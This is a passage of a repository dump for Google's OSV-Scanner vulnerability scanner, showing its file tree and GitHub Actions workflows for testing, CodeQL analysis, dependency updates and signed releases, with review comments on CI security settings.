main.go │ │ │ │ └── osv-scanner.toml │ │ │ ├── json/ │ │ │ │ ├── govulncheckinput.json │ │ │ │ ├── input-no-call-data.json │ │ │ │ ├── input.json │ │ │ │ ├── output-no-call-data.json │ │ │ │ ├── output.json │ │ │ │ ├── vulnbyid-no-call-data.json │ │ │ │ └── vulnbyid.json │ │ │ └── rust/ │ │ │ ├── archives/ │ │ │ │ ├── medium.rlib │ │ │ │ └── simple.rlib │ │ │ ├── functions/ │ │ │ │ ├── medium.json │ │ │ │ ├── 
simple.json │ │ │ │ └── test-rust-2.json │ │ │ ├── objs/ │ │ │ │ ├── medium.o │ │ │ │ ├── simple.o │ │ │ │ └── test-rust-2 │ │ │ └── rust-project/ │ │ │ ├── .gitignore │ │ │ ├── Cargo.toml │ │ │ └── src/ │ │ │ └── main.rs │ │ └── testmain_test.go │ ├── spdx/ │ │ ├── gen.go │ │ ├── licenses.go │ │ ├── satisfies.go │ │ ├── satisfies_test.go │ │ ├── verify.go │ │ └── verify_test.go │ ├── testlogger/ │ │ ├── handler.go │ │ └── markers.go │ ├── testutility/ │ │ ├── fixture.go │ │ ├── jsonreplace.go │ │ ├── jsonreplace_test.go │ │ ├── mock_http.go │ │ ├── normalize.go │ │ ├── snapshot.go │ │ └── utility.go │ ├── thirdparty/ │ │ ├── ar/ │ │ │ ├── COPYING │ │ │ └── reader.go │ │ └── xml/ │ │ ├── atom_test.go │ │ ├── marshal.go │ │ ├── marshal_test.go │ │ ├── read.go │ │ ├── read_test.go │ │ ├── typeinfo.go │ │ ├── xml.go │ │ └── xml_test.go │ ├── tui/ │ │ ├── dependency-graph.go │ │ ├── in-place-info.go │ │ ├── relock-info.go │ │ ├── severity.go │ │ ├── styles.go │ │ ├── tui.go │ │ ├── vuln-info.go │ │ └── vuln-list.go │ ├── url/ │ │ ├── url.go │ │ ├── url_other_test.go │ │ ├── url_test.go │ │ └── url_windows_test.go │ ├── utility/ │ │ ├── depgroup/ │ │ │ └── devgroup.go │ │ ├── maven/ │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ └── testdata/ │ │ │ ├── my-app/ │ │ │ │ └── pom.xml │ │ │ ├── parent/ │ │ │ │ └── pom.xml │ │ │ └── pom.xml │ │ ├── purl/ │ │ │ ├── composer.go │ │ │ ├── composer_test.go │ │ │ ├── golang.go │ │ │ ├── golang_test.go │ │ │ ├── maven.go │ │ │ ├── maven_test.go │ │ │ ├── package_grouper.go │ │ │ ├── package_grouper_test.go │ │ │ ├── purl.go │ │ │ ├── purl_to_package.go │ │ │ └── purl_to_package_test.go │ │ ├── results/ │ │ │ └── results.go │ │ ├── semverlike/ │ │ │ └── version-semver-like.go │ │ ├── severity/ │ │ │ ├── severity.go │ │ │ └── severity_test.go │ │ └── vulns/ │ │ ├── vulnerabilities.go │ │ ├── vulnerabilities_test.go │ │ ├── vulnerability.go │ │ └── vulnerability_test.go │ └── version/ │ └── version.go ├── osv-scanner.toml ├── pkg/ │ 
├── models/ │ │ ├── cyclonedx.go │ │ ├── image.go │ │ ├── results.go │ │ └── results_test.go │ └── osvscanner/ │ ├── __snapshots__/ │ │ ├── filter_internal_test.snap │ │ ├── osvscanner_test.snap │ │ └── vulnerability_result_internal_test.snap │ ├── exclude.go │ ├── exclude_test.go │ ├── filter.go │ ├── filter_internal_test.go │ ├── internal/ │ │ ├── imagehelpers/ │ │ │ └── imagehelpers.go │ │ └── scanners/ │ │ └── lockfile.go │ ├── invsort.go │ ├── osvscanner.go │ ├── osvscanner_test.go │ ├── scan.go │ ├── scan_test.go │ ├── stats.go │ ├── testdata/ │ │ └── filter/ │ │ ├── .gitignore │ │ ├── all/ │ │ │ ├── configs/ │ │ │ │ ├── a/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ ├── b/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ └── c/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── input.json │ │ │ └── want.json │ │ ├── none/ │ │ │ ├── configs/ │ │ │ │ ├── a/ │ │ │ │ │ └── no_config │ │ │ │ ├── b/ │ │ │ │ │ └── osv-scanner.toml │ │ │ │ └── c/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── input.json │ │ │ └── want.json │ │ └── some/ │ │ ├── configs/ │ │ │ ├── a/ │ │ │ │ └── osv-scanner.toml │ │ │ ├── b/ │ │ │ │ └── osv-scanner.toml │ │ │ └── c/ │ │ │ └── osv-scanner.toml │ │ ├── input.json │ │ └── want.json │ ├── testmain_test.go │ ├── vulnerability_result.go │ └── vulnerability_result_internal_test.go ├── renovate.json └── scripts/ ├── build.sh ├── build_snapshot.sh ├── build_test_images.sh ├── examples/ │ └── auto_guided_remediation.py ├── generate_coverage_report.sh ├── generate_mock_resolution_universe/ │ └── main.go ├── generators/ │ ├── GenerateMavenVersions.java │ ├── generate-alpine-versions.py │ ├── generate-cran-versions.R │ ├── generate-debian-versions.py │ ├── generate-packagist-versions.php │ ├── generate-pypi-versions.py │ ├── generate-redhat-versions.py │ └── generate-rubygems-versions.rb ├── report_uncleaned_snapshots.py ├── run_formatters.sh ├── run_lints.sh ├── run_local_docs.sh ├── run_tests.sh └── test_env.dockerfile ================================================ FILE 
CONTENTS ================================================ ================================================ FILE: .dockerignore ================================================ docs/vendor docs/_site dist/ .history/ ================================================ FILE: .editorconfig ================================================ # EditorConfig helps developers define and maintain consistent # coding styles between different editors and IDEs # editorconfig.org root = true [*] end_of_line = lf charset = utf-8 trim_trailing_whitespace = true insert_final_newline = true indent_style = space indent_size = 2 [*.go] indent_style = tab [internal/output/testdata/*.md] trim_trailing_whitespace = false [Makefile] indent_style = tab ================================================ FILE: .gemini/config.yaml ================================================ have_fun: false code_review: disable: false comment_severity_threshold: MEDIUM max_review_comments: -1 pull_request_opened: help: false summary: false code_review: false include_drafts: true ignore_patterns: [] ================================================ FILE: .github/PULL_REQUEST_TEMPLATE/PULL_REQUEST_TEMPLATE.md ================================================ ## Overview **Please create an issue to discuss the proposed changes before sending a pull request.** A brief description of the changes in this pull request. What is the purpose of this PR? What issue does it fix? Fixes # (issue) ## Details Provide a more detailed description of the changes. This can include: - The approach taken to solve the problem. - Any technical details that are relevant to the review. - Before and after screenshots (if applicable). ## Testing Please describe the tests that you ran to verify your changes. For example: - I have added unit tests for the new functionality. - I have run the existing test suite and all tests pass. - I have manually tested the changes in the following way: ... 
## Checklist - [ ] I have signed the [Contributor License Agreement](https://cla.developers.google.com/). - [ ] I have run the linter using `./scripts/run_lints.sh`. - [ ] I have run the unit tests using `./scripts/run_tests.sh`. - [ ] I have made my commits and PR title follow the [Conventional Commits](https://www.conventionalcommits.org/en/v1.0.0/) specification. ================================================ FILE: .github/workflows/cassettes.yml ================================================
# Scheduled (and manually dispatchable) workflow: runs the test suite with the
# recording-related environment variables set below, then opens a pull request
# on the bot/update-cassettes branch with whatever files changed.
name: Cassettes

on:
  schedule:
    - cron: "47 20 * * *"
  workflow_dispatch:

concurrency:
  # Pushing new changes to a branch will cancel any in-progress CI runs
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

# Restrict jobs in this workflow to have no permissions by default; permissions
# should be granted per job as needed using a dedicated `permissions` block
permissions: {}

jobs:
  update:
    # NOTE(review): these scopes are granted to the job's GITHUB_TOKEN, while the
    # pull-request step below authenticates with secrets.PR_TOKEN_BOT. Confirm
    # each write scope is still required; the test script runs in this same job.
    permissions:
      contents: write # to fetch and commit code
      actions: write # to manually dispatch checks on the pull request
      pull-requests: write # Create pull requests
    runs-on: ubuntu-latest
    steps:
      # Actions are pinned to a full commit SHA; the trailing comment records the
      # release tag the pin is meant to correspond to.
      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
        with:
          # Keep the checkout token out of the local git configuration so later
          # steps, including the test script, cannot pick it up from there.
          persist-credentials: false
      - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
        with:
          go-version-file: "go.mod"
          check-latest: true
      # `|| true` forces this step to succeed, so the pull-request step still runs
      # when tests fail (presumably expected while recordings are refreshed).
      # NOTE(review): a genuinely broken test run is also masked here; the
      # resulting diff is the only signal, so it needs a human read.
      - run: ./scripts/run_tests.sh || true
        env:
          # presumably read by the test helpers to re-record HTTP cassettes and
          # rewrite snapshots; verify against the test utilities
          TEST_ACCEPTANCE: true
          TEST_VCR_MODE: recordonly
          UPDATE_SNAPS: always
      - uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0
        with:
          # Dedicated bot secret rather than the job's GITHUB_TOKEN.
          # NOTE(review): its scope is not visible here; confirm it is limited to
          # what opening this pull request needs.
          token: ${{ secrets.PR_TOKEN_BOT }}
          title: "test: update cassettes"
          body: >
            The cassettes have changed, probably due to OSV advisories being changed.
            Please review the differences to make sure that they're expected!
          branch: "bot/update-cassettes"
          # NOTE(review): the value below appears to have lost its address part in
          # this copy (trailing space, nothing after the name); check the original.
          author: "osv-robot "
          commit-message: "test: update cassettes"
================================================ FILE: .github/workflows/checks.yml ================================================ # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: Checks on: push: branches: ["main", "v1", "mcp"] pull_request: # The branches below must be a subset of the branches above branches: ["main", "v1", "mcp"] workflow_dispatch: concurrency: # Pushing new changes to a branch will cancel any in-progress CI runs group: ${{ github.workflow }}-${{ github.ref }} cancel-in-progress: true # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: ensure_snapshots_are_being_cleaned: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: scripts/report_uncleaned_snapshots.py filenames: runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: | find . -mindepth 1 !
-regex '.*/[#@A-Za-z0-9._-]*' -print0 \ | xargs -0 -I{} bash -c \ 'printf "::error file=%q::This filename contains undesired characters\n" "$1" && false' _ {} format: permissions: contents: read # to fetch code (actions/checkout) name: prettier runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Run format action uses: ./.github/workflows/format-action tidy: permissions: contents: read # to fetch code (actions/checkout) name: go mod tidy runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: go mod tidy -diff lint: permissions: contents: read # to fetch code (actions/checkout) name: golangci-lint runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run lint action uses: ./.github/workflows/lint-action prepare_test_image_testdata: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - run: scripts/build_test_images.sh - uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f # v7.0.0 with: name: image-testdata-${{ github.run_number }}-${{ github.run_attempt }} path: cmd/osv-scanner/scan/image/testdata/*.tar retention-days: 1 tests: permissions: contents: read # to fetch code (actions/checkout) needs: - prepare_test_image_testdata name: Run unit tests strategy: fail-fast: 
false matrix: os: [ubuntu-latest, macos-latest, windows-latest] runs-on: ${{ matrix.os }} steps: - name: Check out code uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1 with: pattern: image-testdata-${{ github.run_number }}-* path: cmd/osv-scanner/scan/image/testdata/ - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - name: Run test action uses: ./.github/workflows/test-action with: codecov_token: ${{ secrets.CODECOV_TOKEN }} docker: permissions: contents: read # to fetch code (actions/checkout) runs-on: ubuntu-latest env: # Required for buildx on docker 19.x DOCKER_CLI_EXPERIMENTAL: "enabled" steps: - name: Checkout uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: fetch-depth: 0 - name: Set up Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0 - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0 - name: Run GoReleaser id: run-goreleaser uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0 with: distribution: goreleaser version: "~> v2" args: release --clean --snapshot - env: ARTIFACTS: ${{ steps.run-goreleaser.outputs.artifacts }} run: | echo "$ARTIFACTS" > output.json jq -r '.[] | select( .type == "Docker Image" and .goarch == "amd64" and .goos == "linux" and .extra.DockerConfig.dockerfile == "goreleaser.dockerfile" ) | .name' output.json | while read -r image; do echo "Testing image $image" exit_code=0 docker run -v ${PWD}:/src $image -L /src/go.mod || exit_code=$? 
# fail if we get a non-zero exit code other than "vulnerabilities were found" if [[ $exit_code -ne 0 && $exit_code -ne 1 ]]; then exit $exit_code fi done ================================================ FILE: .github/workflows/codeql-analysis.yml ================================================ # For most projects, this workflow file will not need changing; you simply need # to commit it to your repository. # # You may wish to alter this file to override the set of languages analyzed, # or to provide custom queries or build logic. # # ******** NOTE ******** # We have attempted to detect the languages in your repository. Please check # the `language` matrix defined below to confirm you have the correct set of # supported CodeQL languages. # name: "CodeQL" on: push: branches: [main, v1] pull_request: # The branches below must be a subset of the branches above branches: [main, v1] # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: analyze: name: Analyze runs-on: ubuntu-latest permissions: actions: read contents: read security-events: write strategy: fail-fast: false matrix: language: ["go"] # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] # Learn more about CodeQL language support at https://git.io/codeql-language-support steps: - name: Checkout repository uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 # Update go to the latest version to support minor go versions in the go.mod file - name: Install Go uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: go.mod # Initializes the CodeQL tools for scanning. - name: Initialize CodeQL uses: github/codeql-action/init@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 with: languages: ${{ matrix.language }} # If you wish to specify custom queries, you can do so here or in a config file. 
# By default, queries listed here will override any specified in a config file. # Prefix the list here with "+" to use these queries and those in the config file. # queries: ./path/to/local/query, your-org/your-repo/queries@main # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below) - name: Autobuild uses: github/codeql-action/autobuild@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 # ℹ️ Command-line programs to run using the OS shell. # 📚 https://git.io/JvXDl # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines # and modify them (or add more) to build your code if your project # uses a compiled language #- run: | # make bootstrap # make release - name: Perform CodeQL Analysis uses: github/codeql-action/analyze@b1bff81932f5cdfc8695c7752dcee935dcd061c8 # v4.33.0 ================================================ FILE: .github/workflows/dependencies.yml ================================================ name: Dependencies on: schedule: - cron: "47 18 * * *" workflow_dispatch: concurrency: # Pushing new changes to a branch will cancel any in-progress CI runs group: ${{ github.workflow }}-${{ github.ref }} cancel-in-progress: true # Restrict jobs in this workflow to have no permissions by default; permissions # should be granted per job as needed using a dedicated `permissions` block permissions: {} jobs: update: permissions: contents: write # to fetch and commit code actions: write # to manually dispatch checks on the pull request pull-requests: write # Create pull requests runs-on: ubuntu-latest steps: - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 with: persist-credentials: false - uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0 with: go-version-file: "go.mod" check-latest: true - run: | latest_commit=$(git ls-remote https://github.com/google/osv-scalibr.git HEAD | cut -f1) 
echo "updating osv-scalibr to $latest_commit" go get github.com/google/osv-scalibr@"$latest_commit" echo "latest_scalibr_commit=$latest_commit" >> "$GITHUB_ENV" go mod tidy - run: go test ./cmd/osv-scanner/ -run 'Test_run$' || true env: TEST_ACCEPTANCE: true TEST_VCR_MODE: replaywithnewepisodes UPDATE_SNAPS: always - uses: peter-evans/create-pull-request@c0f553fe549906ede9cf27b5156039d195d2ece0 # v8.1.0 with: token: ${{ secrets.PR_TOKEN_BOT }} title: "feat: update osv-scalibr" body: > This updates `osv-scalibr` to https://github.com/google/osv-scalibr/commit/${{ env.latest_scalibr_commit }} branch: "bot/update-scalibr" author: "osv-robot " commit-message: "feat: update osv-scalibr to ${{ env.latest_scalibr_commit }}" delete-branch: true ================================================ FILE: .github/workflows/format-action/action.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# Composite action with a single step: it runs the repository's formatter
# script (./scripts/run_formatters.sh) under bash.
name: format
description: "Runs file formatters"

runs:
  using: composite
  steps:
    - name: Run formatters
      shell: bash
      run: ./scripts/run_formatters.sh

================================================
FILE: .github/workflows/goreleaser-nightly.yml
================================================
# Builds with GoReleaser using .goreleaser-nightly.yml and logs in to ghcr.io
# so the resulting docker images can be pushed. Runs on a schedule or on a
# manual dispatch; it is never triggered by pull requests.
name: Release nightly github action image

on:
  schedule:
    # we want the nightly builds only on work days
    # (fields 2-6 at 00:00 are Tuesday through Saturday midnight)
    - cron: "0 0 * * 2-6"
  # Allow us to manually call the workflow
  workflow_dispatch:

# Restrict jobs in this workflow to have no permissions by default; permissions
# should be granted per job as needed using a dedicated `permissions` block
permissions: {}

jobs:
  goreleaser:
    outputs:
      # NOTE(review): no step in this job has `id: hash`, so this output
      # evaluates to an empty string and nothing in this workflow reads it.
      # Presumably carried over from the tagged-release workflow; confirm
      # whether nightly images are meant to get a provenance subject.
      hashes: ${{ steps.hash.outputs.hashes }}
    permissions:
      # The only scope granted to this job's GITHUB_TOKEN.
      packages: write # for goreleaser/goreleaser-action to publish docker images
    runs-on: ubuntu-latest
    env:
      # Required for buildx on docker 19.x
      DOCKER_CLI_EXPERIMENTAL: "enabled"
    steps:
      # Every third-party action below is pinned to a full commit SHA; the
      # trailing comment records the release that SHA corresponds to.
      - name: Checkout
        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
        with:
          # Full history rather than a shallow clone.
          fetch-depth: 0
          # Do not leave the token in the local git config for later steps.
          persist-credentials: false
      - name: Set up Go
        uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
        with:
          go-version-file: "go.mod"
          check-latest: true
      - uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0
      - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0
      - name: ghcr-login
        uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
        with:
          registry: ghcr.io
          username: ${{ github.repository_owner }}
          # Job-scoped token, limited by the `permissions` block above.
          password: ${{ secrets.GITHUB_TOKEN }}
      - name: Run GoReleaser
        id: run-goreleaser
        uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0
        with:
          distribution: goreleaser
          # A version range: the action is SHA-pinned, but the GoReleaser
          # release it installs is whatever satisfies this constraint at run time.
          version: "~> v2"
          # Essentially do a snapshot release, but still push the docker images
          # Skipping validate skips checks that the current commit has a tag
          args: release --clean --config .goreleaser-nightly.yml --skip validate,announce
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
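================================================
FILE: .github/workflows/goreleaser.yml
================================================
# Tagged release pipeline: build and publish with GoReleaser, then hand the
# base64-encoded checksum file to the SLSA generic generator so provenance is
# attached to the (draft) release.
name: Release new version

on:
  push:
    tags:
      # The glob matches every tag name, not only version-shaped ones, so
      # anyone able to push a tag can start a release run with
      # `contents: write`; the "Detect stable tag" step only sets STABLE.
      - "*" # triggers only if push new tag version, like `v0.8.4`

# Restrict jobs in this workflow to have no permissions by default; permissions
# should be granted per job as needed using a dedicated `permissions` block
permissions: {}

jobs:
  goreleaser:
    outputs:
      # Produced by the "Generate subject" step (id: hash) and consumed by the
      # provenance job below.
      hashes: ${{ steps.hash.outputs.hashes }}
    permissions:
      contents: write # for goreleaser/goreleaser-action to create a GitHub release
      packages: write # for goreleaser/goreleaser-action to publish docker images
    runs-on: ubuntu-latest
    env:
      # Required for buildx on docker 19.x
      DOCKER_CLI_EXPERIMENTAL: "enabled"
    steps:
      # Every third-party action below is pinned to a full commit SHA; the
      # trailing comment records the release that SHA corresponds to.
      - name: Checkout
        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
        with:
          # Full history rather than a shallow clone.
          fetch-depth: 0
          # Do not leave the token in the local git config for later steps.
          persist-credentials: false
      - name: Set up Go
        uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
        with:
          go-version-file: "go.mod"
          check-latest: true
      - uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0
      - uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0
      - name: ghcr-login
        uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
        with:
          registry: ghcr.io
          username: ${{ github.repository_owner }}
          # Job-scoped token, limited by the `permissions` block above.
          password: ${{ secrets.GITHUB_TOKEN }}
      - name: Detect stable tag
        id: detect_stable
        # Extracts tag name from git ref and check tag is stable
        # semantic version pattern (vMAJOR.MINOR.PATCH, e.g., v1.2.3)
        # The tag is read from the GITHUB_REF_NAME environment variable instead
        # of being interpolated into the script text, and is only matched
        # against an anchored regex; the value written to GITHUB_ENV is a
        # literal true/false, never the tag itself.
        run: |
          TAG="${GITHUB_REF_NAME}"
          if [[ "$TAG" =~ ^v[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
            echo "STABLE=true" >> "$GITHUB_ENV"
          else
            echo "STABLE=false" >> "$GITHUB_ENV"
          fi
      - name: Run GoReleaser
        id: run-goreleaser
        uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0
        with:
          distribution: goreleaser
          # A version range: the action is SHA-pinned, but the GoReleaser
          # release it installs is whatever satisfies this constraint at run time.
          version: "~> v2"
          args: release --clean
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          # Set by the "Detect stable tag" step through GITHUB_ENV.
          STABLE: ${{ env.STABLE }}
      - name: Generate subject
        id: hash
        env:
          # Passed through the environment so the artifact JSON is data to the
          # script rather than part of its source text.
          ARTIFACTS: "${{ steps.run-goreleaser.outputs.artifacts }}"
        run: |
          set -euo pipefail

          # NOTE(review): $checksum_file is expanded unquoted below, as in the
          # original; this assumes jq yields a single path with no whitespace.
          checksum_file=$(echo "$ARTIFACTS" | jq -r '.[] | select (.type=="Checksum") | .path')
          echo "hashes=$(cat $checksum_file | base64 -w0)" >> "$GITHUB_OUTPUT"

  provenance:
    needs: [goreleaser]
    permissions:
      actions: read # To read the workflow path.
      id-token: write # To sign the provenance.
      contents: write # To add assets to a release.
    uses: slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@f7dd8c54c2067bafc12ca7a55595d5ee9b75204a # v2.1.0
    with:
      # The subjects are the checksum entries emitted by the goreleaser job.
      base64-subjects: "${{ needs.goreleaser.outputs.hashes }}"
      upload-assets: true # upload to a new release
      draft-release: true # upload to a new draft release

================================================
FILE: .github/workflows/links.yml
================================================
# Checks links in markdown files on pushes and pull requests that touch *.md,
# and on a twice-weekly schedule.
name: Check markdown links

on:
  push:
    paths:
      - "**.md"
  pull_request:
    paths:
      - "**.md"
  schedule:
    - cron: "45 22 * * 1,4"

# Restrict jobs in this workflow to have no permissions by default; permissions
# should be granted per job as needed using a dedicated `permissions` block
permissions: {}

jobs:
  check:
    permissions:
      contents: read # to fetch code (actions/checkout)
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
        with:
          persist-credentials: false
      - uses: tcort/github-action-markdown-link-check@e7c7a18363c842693fadde5d41a3bd3573a7a225 # v1.1.2
        with:
          use-quiet-mode: "yes"
          base-branch: "main"
          # NOTE(review): this evaluates to 'yes' only for schedule events and
          # 'no' for push and pull_request; confirm that is the intended way
          # round.
          check-modified-files-only: ${{ github.event_name == 'schedule' && 'yes' || 'no'}}

================================================
FILE: .github/workflows/lint-action/action.yml
================================================
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.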
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. name: lint description: "Runs go lints" runs: using: composite steps: - name: Run golangci-lint uses: golangci/golangci-lint-action@1e7e51e771db61008b38414a730f564565cf7c20 # v9.2.0 with: version-file: .golangci-lint-version args: --timeout=5m ================================================ FILE: .github/workflows/osv-scanner-reusable-pr.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action name: OSV-Scanner PR scanning reusable # These are the permissions required by this reusable workflow to function. 
# # You should include a copy of this block next to any `uses:` of this workflow permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files (github/codeql-action/upload-sarif) on: workflow_call: inputs: scan-args: description: "Custom osv-scanner arguments (See https://google.github.io/osv-scanner/usage/ for options, you cannot set --format or --output-file)" type: string default: |- -r ./ results-file-name: description: "File name of the result SARIF file" type: string default: results.sarif upload-sarif: description: "Whether to upload to Security > Code Scanning" type: boolean required: false default: true fail-on-vuln: description: "Whether to fail the action on vulnerability found" type: boolean default: true jobs: scan-pr: runs-on: ubuntu-latest steps: - run: | echo "### This action is deprecated" >> $GITHUB_STEP_SUMMARY echo "Please use https://github.com/google/osv-scanner-action instead" >> $GITHUB_STEP_SUMMARY false ================================================ FILE: .github/workflows/osv-scanner-reusable.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # WARNING, this workflow is for legacy purposes. To view the current workflow see: https://github.com/google/osv-scanner-action name: OSV-Scanner scanning reusable # These are the permissions required by this reusable workflow to function. 
# # You should include a copy of this block next to any `uses:` of this workflow permissions: contents: read # to fetch code (actions/checkout) security-events: write # for uploading SARIF files (github/codeql-action/upload-sarif) on: workflow_call: inputs: scan-args: description: "Custom osv-scanner arguments (See https://google.github.io/osv-scanner/usage/ for options, you cannot set --format or --output-file)" type: string default: |- -r ./ results-file-name: description: "File name of the result SARIF file" type: string default: results.sarif download-artifact: description: "Optional artifact to download for scanning" required: false default: "" type: string upload-sarif: description: "Whether to upload to Security > Code Scanning" type: boolean required: false default: true fail-on-vuln: description: "Whether to fail the action on vulnerability found" type: boolean default: true jobs: osv-scan: runs-on: ubuntu-latest steps: - run: | echo "### This action is deprecated" >> $GITHUB_STEP_SUMMARY echo "Please use https://github.com/google/osv-scanner-action instead" >> $GITHUB_STEP_SUMMARY false ================================================ FILE: .github/workflows/osv-scanner-unified-action.yml ================================================ # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by 